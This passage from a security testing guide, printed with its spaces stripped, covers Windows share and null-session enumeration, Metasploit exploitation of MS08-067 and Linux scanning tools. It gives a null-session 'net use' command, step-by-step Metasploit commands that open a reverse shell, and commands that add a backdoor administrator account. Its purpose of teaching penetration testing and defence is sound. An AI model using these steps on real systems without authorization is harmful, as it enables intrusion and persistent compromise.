userscanaccessthemacrossthenetwork.Sharesareeasytosetupandprovideagreatwaytosharefileswithotherusersonthenetworkwithouthavingtoinvolveaserver.However,they’reoftenmisconfigured,allowingusers,malware,andexternalattackersthathavemadetheirwayinsidethenetworktoaccessinformationtheyshouldn’tbeabletogettootherwise.YoucansearchforWindowsnetworksharesbyusingtheShareFindertoolbuiltintoLanGuard.ThistoolscansanentirerangeofIPaddresses,lookingforWindowsshares,asshowninFigure12-5.
Figure12-5:UsingLanGuardtoscanyournetworkforWindowsshares.
TheEveryonegrouphasfullshareandfileaccesstotheLifeandHealthshareontheTHINKPADhost.Iseesituationslikethisallthetimewheresomeonesharestheirlocaldrivesootherscanaccessit.Theproblemistheyoftenforgettoremovethepermissionsandleaveagapingholeforasecuritybreach.
ThesharesdisplayedinFigure12-5arejustwhatmaliciousinsidersarelookingforbecausethesharenamesgiveahintofwhattypeoffilesmightbeaccessibleiftheyconnecttotheshares.Afterthosewithillintentdiscoversuchshares,they’relikelytodigalittlefurthertoseewhethertheycanbrowseandaccessthefileswithintheshares.IcoversharesandrootingoutsensitiveinformationonnetworkshareslaterinthischapterandinChapter16.
CountermeasuresagainstNetBIOSattacksYoucanimplementthefollowingsecuritycountermeasurestominimizeNetBIOSandNetBIOSoverTCP/IPattacksonyourWindowssystems:
Useanetworkfirewall.
UseWindowsFirewallorsomeotherpersonalfirewallsoftwareoneachsystem.DisableWindowsFileandPrinterSharingwhichcanbefoundintheWindowsControlPanel.Forexample,inWindows8.1it’slocatedunderControlPanel,NetworkandInternet,NetworkandSharingCenter,Changeadvancedsharingsettings.Educateyourusersonthedangersofenablingfileshareswithimpropersecurityaccesscontrolsforeveryonetoaccess.IcovertheserisksfurtherinthischapterbelowaswellasinChapter16.They’renodoubtoneofthegreatestrisksonmostnetworkstoday.
Hiddenshares—thosewithadollarsign($)appendedtotheendofthesharename—don’treallyhelphidethesharename.AnyofthetoolsI’vementionedcanseerightthroughthisformofsecuritybyobscurity.Infact,ifyoucomeacrosssuchshares,you’llwanttolookatthemmoreclosely,asausermaybetryingtohidesomethingorotherwiseknowsthattheinformationontheshareissensitiveanddoesn’twanttodrawattentiontoit.
DetectingNullSessionsAwell-knownvulnerabilitywithinWindowscanmapananonymousconnection(ornullsession)toahiddensharecalledIPC$(whichstandsforinterprocesscommunication).Thisattackmethodcanbeusedto
GatherWindowshostconfigurationinformation,suchasuserIDsandsharenames.Editpartsoftheremotecomputer’sregistry.
AlthoughWindowsServer2008andupaswellasWindows7,Windows8,andWindows10don’tallownullsessionconnectionsbydefault,Ioftencomeacrosssystemsthathavebeenconfiguredinsuchaway(oftenbydisablingWindowsFirewall),thisvulnerabilitycanstillcauseproblemsonyournetwork.
AlthoughlaterversionsofWindowsaremuchmoresecurethantheirpredecessors,don’tassumethatall’swellinWindows-land.Ican’ttellyouhowmanytimesIseesupposedlysecureWindowsinstallations“tweaked”toaccommodateanapplicationorotherbusinessneedthathappenstofacilitateexploitation.
MappingFollowthesestepsforeachWindowscomputertowhichyouwanttomapanullsession:
1. Formatthebasicnetcommand,likethis:netuse\\host_name_or_IP_address\ipc$"""/user:"
Thenetcommandtomapnullsessionsrequirestheseparameters:
net(thebuilt-inWindowsnetworkcommand)followedbytheusecommandTheIPaddressorhostnameofthesystemtowhichyouwanttomapanullconnection
Ablankpasswordandusername
Theblanksarewhyit’scalledanullconnection.
2. PressEntertomaketheconnection.
Figure12-6showsanexampleofthecompletecommandwhenmappinganullsession.Afteryoumapthenullsession,youshouldseethemessageThecommandcompletedsuccessfully.
Figure12-6:MappinganullsessiontoavulnerableWindowssystem.
Toconfirmthatthesessionsaremapped,enterthiscommandatthecommandprompt:
netuse
AsshowninFigure12-6,youshouldseethemappingstotheIPC$shareoneachcomputertowhichyou’reconnected.
GleaninginformationWithanullsessionconnection,youcanuseotherutilitiestogathercriticalWindowsinformationremotely.Dozensoftoolscangatherthistypeofinformation.
You—likeahacker—cantaketheoutputoftheseenumerationprogramsandattempt(asanunauthorizeduser)to
Crackthepasswordsoftheusersfound.(SeeChapter8formoreonpasswordcracking.)Mapdrivestoeachcomputer’snetworkshares.
YoucanusethefollowingapplicationsforsystemenumerationagainstserverversionsofWindowspriortoServer2003aswellasWindowsXP.Don’tlaugh,IstillseethesearchaicversionsofWindowsrunning.
netviewThenetviewcommand(seeFigure12-7)showssharesthattheWindowshosthasavailable.Youcanusetheoutputofthisprogramtoseeinformationthattheserverisadvertisingtotheworldandwhatcanbedonewithit,includingthefollowing:
Shareinformationthatanattackercanusetoexploityoursystems,suchasmappingdrivesandcrackingsharepasswords.Sharepermissionsthatmightneedtoberemoved,suchasthepermissionfortheEveryonegroup,toatleastseetheshareonolderWindows2000–basedsystemsifyouhavethoseonyournetwork.
Figure12-7:netviewdisplaysdrivesharesonaremoteWindowshost.
ConfigurationanduserinformationWinfo(www.ntsecurity.nu/toolbox/winfo)andDumpSec(www.systemtools.com/somarsoft/index.html)cangatherusefulinformationaboutusersandconfigurations,suchas
WindowsdomaintowhichthesystembelongsSecuritypolicysettingsLocalusernamesDriveshares
Yourpreferencemightdependonwhetheryoulikegraphicalinterfacesoracommandline:
Winfoisacommand-linetool.
BecauseWinfoisacommand-linetool,youcancreatebatch(script)filesthatautomatetheenumerationprocess.ThefollowingisanabbreviatedversionofWinfo’soutputofaWindowsNTserver,butyoucancollectthesameinformationfromotherWindowssystems:
Winfo2.0-copyright(c)1999-2003,ArneVidstrom
-http://www.ntsecurity.nu/toolbox/winfo/
SYSTEMINFORMATION:
-OSversion:4.0
PASSWORDPOLICY:
-Timebetweenendoflogontimeandforcedlogoff:Noforcedlogoff
-Maximumpasswordage:42days
-Minimumpasswordage:0days
-Passwordhistorylength:0passwords
-Minimumpasswordlength:0characters
USERACCOUNTS:
*Administrator
(Thisaccountisthebuilt-inadministratoraccount)
*doctorx
*Guest
(Thisaccountisthebuilt-inguestaccount)
*IUSR_WINNT
*kbeaver
*nikki
SHARES:
*ADMIN$
-Type:SpecialsharereservedforIPCoradministrativeshare
*IPC$
-Type:Unknown
*Here2Bhacked
-Type:Diskdrive
*C$
-Type:SpecialsharereservedforIPCoradministrativeshare
*Finance
-Type:Diskdrive
*HR
-Type:Diskdrive
ThisinformationcannotbegleanedfromadefaultinstallationofWindowsServer2003orWindowsXPandlaterversionsofWindows—onlyfromsupportedsystems.
YoucanperusetheoutputofsuchtoolsforuserIDsthatdon’tbelongonyoursystem,suchas
Ex-employeeaccountsthathaven’tbeendisabledPotentialbackdooraccountsthatahackermighthavecreated
Ifattackersgetthisinformation,theycanattempttoexploitpotentiallyweakpasswordsandloginasthoseusers.
Countermeasuresagainstnullsessionhacks
Ifitmakesgoodbusinesssenseandthetimingisright,upgradetothemoresecureWindowsServer2012orWindowsServer2016aswellasWindows7orWindows10.Theydon’thavethevulnerabilitiesdescribedinthefollowinglist.
Youcaneasilypreventnullsessionconnectionhacksbyimplementingoneormoreofthefollowingsecuritymeasures:
BlockNetBIOSonyourWindowsserverbypreventingtheseTCPportsfrompassingthroughyournetworkfirewallorpersonalfirewall:
139(NetBIOSsessionsservices)445(runsSMBoverTCP/IPwithoutNetBIOS)
DisableFileandPrinterSharingforMicrosoftNetworksinthePropertiestabofthemachine’snetworkconnectionforthosesystemsthatdon’tneedit.
Restrictanonymousconnectionstothesystem.IfyouhappentohaveanyWindowsNTandWindows2000systemsleftinyourenvironment(hopefullynot!),youcansetHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymoustoaDWORDvalueasfollows:
None:Thisisthedefaultsetting.RelyonDefaultPermissions(Setting0):Thissettingallowsthedefaultnullsessionconnections.DoNotAllowEnumerationofSAMAccountsandShares(Setting1):Thisisthemediumsecuritylevelsetting.ThissettingstillallowsnullsessionstobemappedtoIPC$,enablingsuchtoolsasWalksamtogarnerinformationfromthesystem.NoAccesswithoutExplicitAnonymousPermissions(Setting2):Thishighsecuritysettingpreventsnullsessionconnectionsandsystemenumeration.
Highsecuritycreatesproblemsfordomaincontrollercommunicationandnetworkbrowsing,sobecareful!Youcanendupcripplingthenetwork.
MicrosoftKnowledgeBaseArticle246261coversthecaveatsofusingthehighsecuritysettingforRestrictAnonymous.It’savailableonthewebathttp://support.microsoft.com/default.aspx?scid=KB;en-us;246261.
ForlaterversionsofWindows,suchasWindowsServer2008R2andWindows7,ensurethattheNetworkAccessanonymouscomponentsofthelocalorgroupsecuritypolicyaresetasshowninFigure12-8.
Figure12-8:DefaultlocalsecuritypolicysettingsinWindows7thatrestrictnullsessionconnections.
CheckingSharePermissionsWindowssharesaretheavailablenetworkdrivesthatshowupwhenusersbrowsethenetworkinMyNetworkPlaces.Windowssharesareoftenmisconfigured,allowingmorepeopletohaveaccesstothemthantheyshould.Thecasualbrowsercanexploitthissecurityvulnerability,butamaliciousinsidergainingunauthorizedaccesstoaWindowssystemcanresultinserioussecurityandcomplianceconsequences,includingtheleakageofsensitiveinformationandeventhecorruptionordeletionofcriticalfiles.
WindowsdefaultsThedefaultsharepermissiondependsontheWindowssystemversion.
Windows2000/NTWhencreatingsharesinWindowsNTandWindows2000,thegroupEveryoneisgivenFullControlaccessinthesharebydefaultforallfilesto:
BrowsefilesReadfilesWritefiles
YoushouldnolongerhavetheseversionsofWindowsrunningonyournetworkbutIdostillseetheseversionsoutthere.
AnyonewhomapstotheIPC$connectionwithanullsession(asdescribedintheprevioussection,“NullSessions”)isautomaticallymadepartoftheEveryonegroup.ThismeansthatremotehackerscanautomaticallygainBrowse,Read,andWriteaccesstoaWindowsNTorWindows2000serverafterestablishinganullsession.
WindowsXPandnewerInWindowsXPandnewer(WindowsServer2008R2,Windows7,andsoon),theEveryonegroupisgivenonlyReadaccesstoshares.ThisisdefinitelyanimprovementoverthedefaultsinWindows2000andWindowsNT.However,youstillmighthavesituationsinwhichyoudon’twanttheEveryonegrouptoevenhaveReadaccesstoashare.
Sharepermissionsaredifferentfromfilepermissions.Whencreatingshares,youhavetosetboth.IncurrentversionsofWindows,thishelpscreatehoopsforcasualuserstojumpthroughanddiscouragesharecreation,butit’snotfoolproof.UnlessyouhaveyourWindowsdesktopscompletelylockeddown,userscanstill
shareouttheirfilesatwill.
TestingAssessingyoursharepermissionsisagoodwaytogetanoverallviewofwhocanaccesswhat.Thistestingshowshowvulnerableyournetworkshares—andsensitiveinformation—canbe.Youcanfindshareswithdefaultpermissionsandunnecessaryaccessrightsenabled.Trustme;they’reeverywhere!
ThebestwaytotestforshareweaknessesistologintotheWindowssystemviaastandardlocalordomainuserwithnospecialprivilegesandrunanenumerationprogramsoyoucanseewhohasaccesstowhat.
AsIoutlinedearlier,LanGuardhasbuilt-insharefindercapabilitiesforuncoveringunprotectedshares,theoptionsforwhichareshowninFigure12-9.
Figure12-9:LanGuard’sShareFinderprofileseeksoutWindowsshares.
IoutlinemoredetailsonuncoveringsensitiveinformationinunstructuredfilesonnetworksharesandotherstoragesystemsinChapter16.
ExploitingMissingPatchesIt’sonethingtopokeandprodWindowstofindvulnerabilitiesthatmighteventuallyleadtosomegoodinformation—maybesystemaccess.However,it’squiteanothertostumbleacrossavulnerabilitythatwillprovideyouwithfullandcompletesystemaccess—allwithin10minutes.Well,it’snotanemptythreatforsomeonetorun“arbitrarycode”onasystemthatmayleadtoavulnerabilityexploitation.WithsuchtoolsasMetasploit,allittakesisonemissingpatchononesystemtogainaccessanddemonstratehowtheentirenetworkcanbecompromised.Amissingpatchlikethisisthecriminalhacker’spotofgold.
Evenwithallthewrittensecuritypoliciesandfancypatchmanagementtools,oneverynetworkIcomeacross,numerousWindowssystemsdon’thaveallthepatchesapplied.Theremaybeareasonforitsuchasfalsepositivesfromvulnerabilityscannersorthemissingpatcheshavedeemedtobeacceptablerisks.Evenifyouthinkallyoursystemshavethelatestpatchesinstalled,youhavetobesure.It’swhatsecurityassessmentsIareallabout:Trustbutverify.
Beforeyougo’sploitin’vulnerabilitieswithMetasploit,it’sveryimportanttoknowthatyou’reventuringintosensitiveterritory.Notonlycanyougainfull,unauthorizedaccesstosensitivesystems,butyoucanalsoputthesystemsbeingtestedintoastatewheretheycanhangorreboot.So,readeachexploit’sdocumentationandproceedwithcaution.
Beforeyoucanexploitamissingpatchorrelatedvulnerability,youhavetofirstfindoutwhat’savailableforexploitation.ThebestwaytogoaboutdoingthisistouseatoolsuchasNexposeorLanGuardtofindthem.I’vefoundNexposetobeverygoodatrootingoutsuchvulnerabilitiesevenasanunauthenticateduseronthenetwork.Figure12-10showsNexposescanresultsofaWindowsserversystemthathasthenastyWindowsPlugandPlayRemoteCodeExecutionvulnerability(MS08-067)from2008thatIstillseequiteoften.
Windows10securityWithallthevulnerabilitiesinWindows,it’ssometimestemptingtojumpshipandmovetoLinuxorMacOSX.Butnotsofast.MicrosoftmadegreatstrideswithsecurityinWindows7andWindows8.x—bothofwhichhavelaidthegroundworkforwhat’snowthemuchmoresecureWindows10.
BuildingonWindows8.x,MicrosofthasmadeevenmoreimprovementsinWindows10beyondtherestoredstartbuttonandstartmenu,includingthefollowing:
WindowsUpdateforBusinessthatprovidesgreatercontroloverenterpriseWindowspatchmanagement.
ScheduledrestartsforWindowspatchestoperhapsnudgeusersalong.
WindowsHelloforuserauthenticationsupportingexistingfingerprintscannersandotherbiometricdevicessuchasfaceandirisscanners.
Finally,Windows10isevenfasterthanWindows8—whichisreallynice,especiallyifyouusetheOSforsecuritytesting.Itsspeedmightalsobejustwhatyouneedtoputanendtousersdisablingtheirantivirussoftwaretospeedtheircomputersup—whichhappensquiteoften.
HavingrunvariousscansandattacksagainstWindows10systems,I’vefoundthatit’sadarnsecuredefaultinstallation.But,thatdoesn’tmeanWindows10isimmunetoattackandabuse.Aslongasthehumanelementisinvolvedinsoftwaredevelopment,networkadministration,andend-userfunctions,peoplewillcontinuetomakemistakesthatleavewindowsopen(punintended)forthebadguystosneakthroughandcarryouttheirattacks.Thekeyistomakesureyouneverletyourguarddown!
UsingMetasploitAfteryoufindavulnerability,thenextstepistoexploitit.Inthisexample,IuseMetasploitFramework(anopensourcetoolownedandmaintainedbyRapid7)andobtainaremotecommandpromptonthevulnerableserver.Here’show:
1. DownloadandinstallMetasploit(currentlyatversion4.11)fromwww.rapid7.com/products/metasploit/download.jsp.
IusetheWindowsversion;allyouhavetodoisdownloadandruntheexecutable.
2. Aftertheinstallationiscomplete,runtheMetasploitConsole,whichisMetasploit’smainconsole.
There’salsoaweb-basedversionofMetasploitthatyoucanaccessthroughyourbrowser(MetasploitWebUI),butIprefertheconsoleinterface.
YouseeascreensimilartotheoneshowninFigure12-11.
3. Entertheexploityouwishtorun.Forexample,ifyouwanttoruntheMicrosoftMS08-067PlugandPlayexploit,enterthefollowing:
useexploit/windows/smb/ms08_067_netapi
4. Entertheremotehost(RHOST)youwishtotargetandtheIPaddressofthelocalhost(LHOST)you’reonwiththefollowingcommand:
setRHOSTip_address
setLHOSTip_address
5. Setthetargetoperatingsystem(usually0forautomatictargeting)withthefollowingcommand:
setTARGET0
6. Setthepayload(exploitdata)thatyouwanttoexecute.Itypicallychoosewindows/shell_reverse_tcpasitprovidesaremotecommandpromptonthesystembeingexploited.
Figure12-12showswhatyoushouldhavedisplayedintheMetasploitconsolescreen.
7. ThefinalstepistosimplyenterexploitintheMetasploitconsole.ThiscommandinvokesthefinalstepwhereMetasploitdeliversthepayloadtothetargetsystem.Assumingtheexploitissuccessful,youshouldbepresentedacommandpromptwhereyoucanentertypicalDOScommandssuchas‘dir’asshowninFigure12-13.
Figure12-11:ThemainMetasploitconsole.
Figure12-12:Metasploitoptionstoobtainaremotecommandpromptonthetargetsystem.
Figure12-13:RemotecommandpromptontargetsystemobtainedbyexploitingamissingWindowspatch.
Inthisironicexample,aMacisrunningWindowsviatheBootCampsoftware.Inow“own”thesystemandamabletodowhateverIwant.Forexample,onethingIcommonlydoisaddauseraccounttotheexploitedsystem.YoucanactuallydothiswithinMetasploit(viatheadduserpayloads),butIprefertodoitonmyownsoIcan
getscreenshotsofmyactions.Toaddauser,simplyenternetuserusernamepassword/addattheMetasploitcommandprompt.
Next,Iaddtheusertothelocaladministratorsgroupbyenteringnetlocalgroupadministratorsusername/addattheMetasploitcommandprompt.YoucanthenlogintotheremotesystembymappingadrivetotheC$shareorbyconnectingviaRemoteDesktop.
Ifyouchoosetoaddauseraccountduringthisphase,besuretoremoveitwhenyoufinish.Otherwise,youcancreateanothervulnerabilityonthesystem—especiallyiftheaccounthasaweakpassword.Chapter3coversrelatedissues,suchastheneedforacontractwhenperformingyourtesting.Youwanttomakesureyou’vecoveredyourself.
Allinall,thisishackingatitsfinest!
ThreeuniqueversionsofMetasploitareavailablefromRapid7.ThefreeeditionoutlinedintheprecedingstepsiscalledMetasploitFramework.Itmaybeallyouneedifanoccasionalscreenshotofremoteaccessorsimilarissufficientforyourtestingpurposes.There’salsoMetasploitCommunitywhichisaccessibleviaawebuserinterfaceandintendedforsmallnetworks.Finally,there’safull-blowncommercialversioncalledMetasploitProfortheserioussecurityprofessional.MetasploitProaddsfeaturesforsocialengineering,webapplicationscanning,anddetailedreporting.
MetasploitPro’sOverviewscreenisshowninFigure12-14.NotetheworkflowfeaturesintheQuickStartWizardsiconsincludingQuickPenTest,PhishingCampaign,andWebAppTest.It’sawell-thought-outinterfacethattakesthepainoutoftraditionalsecurityscanning,exploitation,andreporting,whichisespeciallyusefulforthelesstechnicalITprofessional.
Figure12-14:MetasploitPro’sgraphicalinterfaceprovidesbroadsecuritytestingcapabilitiesincludingphishingandwebapplicationsecuritychecks.
MetasploitProprovidesyouwiththeabilitytoimportscannerfindings(typicallyXMLfiles)fromthird-partyvulnerabilityscannerssuchasAcunetixWebVulnerabilityScanner,Netsparker,andNexpose.SimplyclickthenameofyourprojectintheProjectListingsection(orcreateanewonebyselectingNewProject)andthenclickingtheImportbutton.Afterthescandatafileisimported,youcanclicktheVulnerabilitiestabandseealltheoriginalvulnerabilityscannerfindings.Toexploitoneofthevulnerabilities(assumingit’sasupportedexploitinMetasploitPro),simplyclickthefindingundertheNamecolumnandyou’llbepresentedwithanewpagethatallowsyoutoclickExploitandexecutetheflaw,asshowninFigure12-15.
Figure12-15:StartingtheexploitprocessinMetasploitProisassimpleasimportingyourscannerfindingsandclickingExploit.
KeepinmindthatI’vedemonstratedonlyafractionofwhatMetasploitFrameworkandMetasploitProcando.Ihighlyrecommendyoudownloadoneorbothandfamiliarizeyourselfwiththesetools.Numerousresourcesareavailableatwww.metasploit.com/helpthatcanhelpyoutakeyourskillsettothenextlevel.ThepowerofMetasploitisunbelievableallbyitself.Combineitwiththeexploitcodethat’scontinuallyupdatedatsitessuchasOffensiveSecurity’sExploitsDatabase(www.exploit-db.com),andyouhavepracticallyeverythingyouneedifyouchoosetodrilldowntothatlevelofexploitationinyoursecuritytesting.
CountermeasuresagainstmissingpatchvulnerabilityexploitsPatchyoursystems—boththeWindowsOSandanyMicrosoftorthird-partyapplicationsrunningonthem.Iknowit’saloteasiersaidthandone.Seriously,that’sallthereistoit.CombinethatwiththeotherhardeningrecommendationsIprovideinthischapter,andyouhaveaprettydarnedsecureWindowsenvironment.
Togetyourarmsaroundthepatchingprocess,youhavetoautomateitwhereveryoucan.YoucanuseWindowsUpdate—orbetteryet—WindowsServerUpdateServices(WSUS)forMicrosoft-centricpatches,whichcanbefoundathttp://technet.microsoft.com/en-us/wsus/default.aspx.Ican’tstressenoughhowyouneedtogetyourthird-partypatchesforAdobe,Java,andsoonundercontrol.Ifyou’relookingforacommercialalternative,checkoutGFILanGuard’spatchmanagementfeatures(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)andLumensionPatchandRemediation
(www.lumension.com/vulnerability-management/patch-management-software.aspx).Icoverpatchingmorein-depthinChapter18.
RunningAuthenticatedScansAnothertestyoucanrunagainstyourWindowssystemsisan“authenticated”scan—essentiallylookingforvulnerabilitiesasatrusteduser.Ifindthesetypesofteststobeverybeneficialbecausetheyoftenhighlightsystemproblemsandevenoperationalsecurityweaknesses(suchaspoorchangemanagementprocesses,weakpatchmanagement,andlackofinformationclassification)thatwouldneverbediscoveredotherwise.
Atrustedinsiderwhohasphysicalaccesstoyournetworkandtherighttoolscanexploitvulnerabilitiesevenmoreeasily.ThisisespeciallytrueifnointernalaccesscontrollistsorIPSisinplaceand/oramalwareinfectionoccurs.
AwaytolookforWindowsweaknesseswhileyou’reloggedin(thatis,throughtheeyesofamaliciousinsider)isbyusingsomeofthevulnerabilityscanningtoolsI’vementioned,suchasLanGuardandNexpose.Figure12-16showsthenice(andrare)featurethatNexposehastotestyourlogincredentialsbeforegettingvulnerabilityscansstarted.Beingabletovalidatelogincredentialsbeforeyoustartyourscanscansaveanamazingamountoftime,hassle,andmoney.
Figure12-16:TestinglogincredentialsbeforerunninganauthenticatedscanwithNexposetoseewhattrustedinsiderscanseeandexploit.
Irecommendrunningauthenticatedscansasadomainorlocaladministrator.Thiswillshowyouthegreatestamountofsecurityflawsaswellaswhohasaccesstowhatintheeventthatavulnerabilityispresent.You’lllikelybesurprisedtofindoutthatalarge
portionofvulnerabilities,suchasthoselistedinFigure12-16,areaccessibleviaastandarduseraccount.Youdon’tnecessarilyneedtorunauthenticatedscanseverytimeyoutestforsecurityflaws,butdoingsoatleastonceortwiceperyearisnotabadidea.
YoucanalsouseMicrosoftBaselineSecurityAnalyzer(MBSA)tocheckforbasicvulnerabilitiesandmissingpatches.MBSAisafreeutilityfromMicrosoftthatyoucandownloadatwww.microsoft.com/technet/security/tools/mbsahome.mspx.MBSAchecksallWindowsXPandlater(Windows10isnotyetsupported)operatingsystemsformissingpatches.ItalsotestsWindows,SQLServer,Office,andIISforbasicsecuritysettings,suchasweakpasswords.Youcanusetheseteststoidentifysecurityweaknessesinyoursystems.
WithMBSA,youcanscaneitherthelocalsystemyou’reloggedintoorcomputersacrossthenetwork.Onecaveat:MBSArequiresanadministratoraccountonthelocalmachinesyou’rescanning.
LinuxInThisChapter
ExaminingLinuxhackingtools
PortscanningLinuxhosts
GleaningLinuxinformationwithoutloggingin
ExploitingcommonvulnerabilitieswhenloggedintoLinux
MinimizingLinuxsecurityrisks
Linuxhasn’tmadeinroadsontotheenterprisedesktopthewaythatWindowshas,butLinuxstillhasitspresenceinpracticallyeverynetworknonetheless.AcommonmisconceptionisthatLinuxismoresecurethanWindows.However,moreandmore,LinuxanditssistervariantsofUNIXarepronetosomeofthesametypesofsecurityvulnerabilities,soyoucan’tletyourguarddown.
HackersareattackingLinuxindrovesbecauseofitspopularityandgrowingusageintoday’snetworkenvironment.BecausesomeversionsofLinuxarefree—inthesensethatyoudon’thavetopayforthebaseoperatingsystem—manyorganizationsareinstallingLinuxfortheirwebserversande-mailserversinhopesofsavingmoneyandhavingamoresecuresystem.Linuxhasgrowninpopularityforotherreasonsaswell,includingthefollowing:
Abundantresourcesareavailable,includingbooks,websites,anddeveloperandconsultantexpertise.There’salowerriskthatLinuxwillbehitwithasmuchmalwareasWindowsanditsapplicationshavetodealwith.Linuxexcelswhenitcomestosecurity,butitprobablywon’tstaythatway.Therehasbeenincreasedbuy-infromotherUNIXvendors,includingIBM,HP,andOracle.UNIXandLinuxhavebecomeincreasinglyeasiertouse.
WorkstationoperatingsystemssuchasMacOSXandChromeOSarebecomingmainstreaminbusinesstoday.TheseOSsarebasedonUNIX/LinuxcoresandaresusceptibletomanyoftheLinuxflawsIdiscussinthischapter.Therefore,theyneedtobeincludedinthescopeofyoursecuritytests.
Inmyownsecurityassessmentwork,I’mnotseeingmanyglaringChromeOS-basedvulnerabilities(yet),butIamseeingweaknessesinMacOSX,especiallyasitinvolvesthird-partysoftwarethatcanbeexploitedbymalwareandeventoolssuchas
Metasploit.Iseesuchflawsmoreoftenwhenperformingauthenticatedscanssomakesureyou’redoingthoseaswell.
BasedonwhatIseeinmywork,Linuxislessvulnerabletocommonsecurityflaws—especiallyasitrelatestomissingthird-partypatchesforAdobe,Java,andthelike—thanWindows.WhencomparinganycurrentdistributionofLinux,suchasUbuntuandRedHat/Fedora,withWindows7orWindows10,ItendtofindmoreweaknessesintheWindowssystems.Chalkituptowidespreaduse,morefeatures,oruneducatedusers,butthereseemstobealotmorethatcanhappeninaWindowsenvironment.Thatsaid,Linuxiscertainlynotflawless.InadditiontothepasswordattacksIcoverinChapter8,certainremoteandlocalattacksarepossibleagainstLinux-basedsystems.Inthischapter,IshowyousomesecurityissuesintheLinuxoperatingsystemandoutlinesomecountermeasurestoplugtheholessoyoucankeepthebadguysout.Don’tletthetitleofthischapterfoolyou—alotofthisinformationappliestoallflavorsofUNIX.
UnderstandingLinuxVulnerabilitiesVulnerabilitiesandattacksagainstLinuxarecreatingbusinessrisksinagrowingnumberoforganizations—especiallye-commercecompanies,networkandIT/securityvendors,andcloudserviceprovidersthatrelyonLinuxformanyoftheirsystems,includingtheirownproducts.WhenLinuxsystemsarehacked,thevictimorganizationscanexperiencethesamesideeffectsastheirWindows-usingcounterparts,including:
LeakageofsensitiveinformationCrackedpasswordsCorruptedordeleteddatabasesSystemstakencompletelyoffline
ChoosingToolsYoucanusemanyLinux-basedsecuritytoolstotestyourLinuxsystems.Somearemuchbetterthanothers.IoftenfindthatmyWindows-basedcommercialtoolsdoasgoodajobasany.Myfavoritesareasfollows:
KaliLinux(www.kali.org)toolsetonabootableDVDor.isoimagefileLanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)forportscanning,OSenumeration,andvulnerabilitytestingNetScanToolsPro(www.netscantools.com)forportscanning,OSenumeration,andmuchmore
Nexpose(www.rapid7.com/products/nexpose)fordetailedportscanning,OSenumeration,andvulnerabilitytesting
AtoolsuchasNexposecanperformthemajorityofthesecuritytestingneededtofindflawsinLinux.AnotherpopularcommercialalternativeisofferedbyQualys(www.qualys.com).
Nmap(https://nmap.org)forOSfingerprintinganddetailedportscanningNessus(www.tenable.com/products/nessus-vulnerability-scanner.forOSfingerprinting,portscanning,andvulnerabilitytesting
ManyotherLinuxhackingandtestingtoolsareavailableonsuchsitesasSourceForge.net(http://sourceforge.net)andfreecode.com(http://freecode.com).Thekeyistofindasetoftools—preferablyasfewaspossible—thatcandothejobthatyouneedtodoandthatyoufeelcomfortableworkingwith.
GatheringInformationAboutYourLinuxVulnerabilities
YoucanscanyourLinux-basedsystemsandgatherinformationfrombothoutside(ifthesystemisapublicly-accessiblehost)andinsideyournetwork.Thatway,youcanseewhatthebadguysseefrombothdirections.
SystemscanningLinuxservices—calleddaemons—aretheprogramsthatrunonasystemandserveupvariousservicesandapplicationsforusers.
Internetservices,suchastheApachewebserver(httpd),telnet(telnetd),andFTP(ftpd),oftengiveawaytoomuchinformationaboutthesystem,includingsoftwareversions,internalIPaddresses,andusernames.Thisinformationcouldallowhackerstoexploitaknownweaknessinthesystem.TCPandUDPsmallservices,suchasecho,daytime,andchargen,areoftenenabledbydefaultanddon’tneedtobe.
ThevulnerabilitiesinherentinyourLinuxsystemsdependonwhatservicesarerunning.Youcanperformbasicportscanstogleaninformationaboutwhat’srunning.
TheNetScanToolsProresultsinFigure13-1showmanypotentiallyvulnerableservicesonthisLinuxsystem,includingtheconfirmedservicesofSSH,HTTP,andHTTPS.
Figure13-1:PortscanningaLinuxhostwithNetScan-ToolsPro.
InadditiontoNetScanToolsPro,youcanrunanotherscanner,suchasNexpose,againstthesystemtotrytogathermoreinformation,includingaserverrunningSSLversion3withweakencryptionciphers,asshowninFigure13-2.
Figure13-2:UsingNexposetodiscovervulnerabilitieswithSSL.
Keepinmindthatyou’regoingtofindthemostvulnerabilitiesinLinuxandMacOSXbyperformingauthenticatedvulnerabilityscans.Thisisparticularlyimportanttodobecauseitshowsyouwhat’sexploitablebyusers—ormalware—onyoursystems.And,yes,evenLinuxandMacOSXaresusceptibletomalware!You’llwanttorunsuchscansatleastonceperyearorafteranymajorapplicationorOSupgradesonyourworkstationsandservers.
Figure13-3showstheabsolutelyamazingfeatureinNexposethatallowsyoutoactuallytestyourlogincredentialsbeforekickingoffavulnerabilityscanofyournetwork.
Figure13-3:UsingtheTestCredentialsfeatureaspartoftheNexposescanconfiguration.
What’sthebigdealaboutthisfeature,yousay?Well,firstoff,itcanbeawholelotofhassletothinkyou’reenteringtheproperlogincredentialsintothescanneronlytofindouthourslaterthattheloginswerenotsuccessful,whichcaninvalidatethescanyouran.Itcanalsobeathreattoyourbudget(orwallet,ifyouworkforyourself)ifyou’rechargedbythescanonlytodiscoverthatyouhavetore-scanhundreds,eventhousands,ofnetworkhosts.I’vebeendownthatroadmanytimesandit’sarealpain,tosaytheleast.
YoucanusefreetoolstogoastepfurtherandfindouttheexactdistributionandkernelversionbyrunninganOSfingerprintscanwiththeNmapcommandnmap–sV–O,asshowninFigure13-4.
Figure13-4:UsingNmaptodeterminetheOSkernelversionofaLinuxserver.
TheWindows-basedNetScanToolsProalsohasthecapabilitytodeterminetheversionofLinuxthat’srunning,asshowninFigure13-5.
Figure13-5:UsingNetScan-ToolsProtodeterminethatSlackwareLinuxislikelyrunning.
CountermeasuresagainstsystemscanningAlthoughyoucan’tcompletelypreventsystemscanning,youcanstillimplementthefollowingcountermeasurestokeepthebadguysfromgleaningtoomuchinformationaboutyoursystemsandusingitagainstyousomehow:
Protectthesystemswitheither:Afirewall,suchasiptables,that’sbuiltintotheOSAhost-basedintrusionpreventionsystem,suchasPortSentry(http://sourceforge.net/projects/sentrytools),alocalagentsuchasSnare(www.intersectalliance.com/our-product/snare-agent),orMcAfeeHostIntrusionPreventionforServer(www.mcafee.com/us/products/host-ips-for-server.aspx)thattiesintoalargersecurityincidentandeventmanagement(SIEM)systemthatmonitorsforandcorrelatesnetworkevents,anomalies,andbreaches.
